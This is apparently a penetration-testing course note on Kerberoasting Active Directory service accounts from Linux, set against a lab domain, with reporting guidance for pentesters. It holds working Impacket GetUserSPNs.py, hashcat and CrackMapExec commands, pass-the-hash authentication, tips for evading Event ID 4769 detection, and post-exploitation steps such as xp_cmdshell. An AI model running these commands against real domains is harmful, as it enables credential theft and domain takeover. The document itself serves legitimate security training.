
Kerberoasting - from Linux

Kerberoasting from a Linux attack host using Impacket’s GetUserSPNs.py. Requires valid domain credentials (cleartext password or NTLM hash) and the IP of a Domain Controller.

Kerberoasting Overview

Kerberoasting targets accounts that have a Service Principal Name (SPN) set. Any authenticated domain user can ask the KDC for a TGS (service) ticket for any SPN, and that ticket is encrypted with the service account's long-term key, which for RC4-HMAC (etype 23) is simply the account's NTLM hash. The ticket is then cracked offline. This works for any service account in the same domain, and across forest trusts if authentication over the trust is permitted.

Why It Works

  • Domain accounts running services are often local admins or members of privileged groups (Domain Admins, either directly or via nested membership)
  • Service accounts frequently have weak or reused passwords to simplify administration
  • The service ticket inside the TGS-REP is encrypted with the service account's long-term key (its NTLM hash for RC4-HMAC), so each password guess can be checked offline against the ticket bytes with no further interaction with the target
  • Even a cracked account with no privileged group membership can be useful: if the SPN is MSSQL/SRV01, the service account usually holds sysadmin on that SQL instance, which lets you enable xp_cmdshell for code execution

Prerequisites

Requirement                Details
Domain user credentials    Cleartext password, NTLM hash, or Kerberos ticket
Domain Controller IP       Target for LDAP queries and ticket requests
Network access             Ability to reach the DC on Kerberos (88) and LDAP (389/636)

Attack Positions

  • From a non-domain-joined Linux host with valid domain credentials
  • From a domain-joined Linux host as root (via keytab file)
  • From a domain-joined Windows host (as domain user, domain account shell, or SYSTEM)
  • From a non-domain-joined Windows host using runas /netonly

Performing the Attack with GetUserSPNs.py

Install Impacket

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
sudo python3 -m pip install .

Enumerate SPN Accounts

List all SPN accounts with their group memberships and password age:

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend

The output lists each SPN with its account name, group membership (MemberOf), PasswordLastSet and LastLogon. Focus on accounts that are members of Domain Admins or other privileged groups; these are the high-value targets.

Request All TGS Tickets

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request

Outputs all TGS hashes in Hashcat/John-compatible format directly to the terminal. This is also the noisiest option: every request is logged on the DC as Event ID 4769, and a burst of RC4 (ticket encryption type 0x17) requests for many SPNs from a single account is a common Kerberoasting detection signature. Where that matters, request tickets for specific accounts instead.

Request a Single User’s TGS Ticket

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev

Save Hashes to a File

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -request-user sqldev -outputfile sqldev_tgs

Authenticate with an NTLM Hash

GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend -hashes :NTLM_HASH -request

The -hashes argument takes LMHASH:NTHASH; the LM half can be left empty, as here, since only the NT hash is needed.

Cracking TGS Tickets

hashcat -m 13100 sqldev_tgs /usr/share/wordlists/rockyou.txt

Mode 13100 is for RC4-HMAC tickets, which GetUserSPNs.py prints with the prefix $krb5tgs$23$. If a line starts with $krb5tgs$17$ or $krb5tgs$18$ the ticket was issued with AES128 or AES256; use -m 19600 or -m 19700 respectively. AES tickets crack far more slowly because the key is derived from the password with PBKDF2 rather than being the NTLM hash itself.

TGS tickets take longer to crack than NTLM hashes. If the service account has a strong password, cracking may be infeasible even with a GPU rig.

Verifying Cracked Credentials

Confirm access with CrackMapExec:

sudo crackmapexec smb 172.16.5.5 -u sqldev -p 'database!'

A successful login confirms the password is valid for the domain account; (Pwn3d!) in the output additionally means the account has local administrator rights on that host.

Efficacy & Reporting

The value of Kerberoasting findings depends on what you crack:

Scenario                                           Risk rating   Rationale
Cracked ticket leads to Domain Admin               High          Direct path to domain compromise
Cracked ticket gives useful lateral movement       High          Expands access, contributes to the attack chain
Tickets cracked but no privileged access gained    High          Weak service account passwords are still exploitable
No tickets cracked despite extended effort         Medium        SPNs exist (risk), but strong passwords mitigate impact

Even when no tickets crack, report the finding — strong passwords can always be changed to weak ones, and a determined attacker with better hardware may succeed.

Post-Exploitation with Cracked Credentials

Once service account passwords are obtained:

  • Access hosts via RDP or WinRM as a local user/admin
  • Remote admin via PsExec or similar tools
  • Access sensitive file shares
  • MSSQL access as DBA for privilege escalation (xp_cmdshell)
  • Continue domain enumeration for further attack paths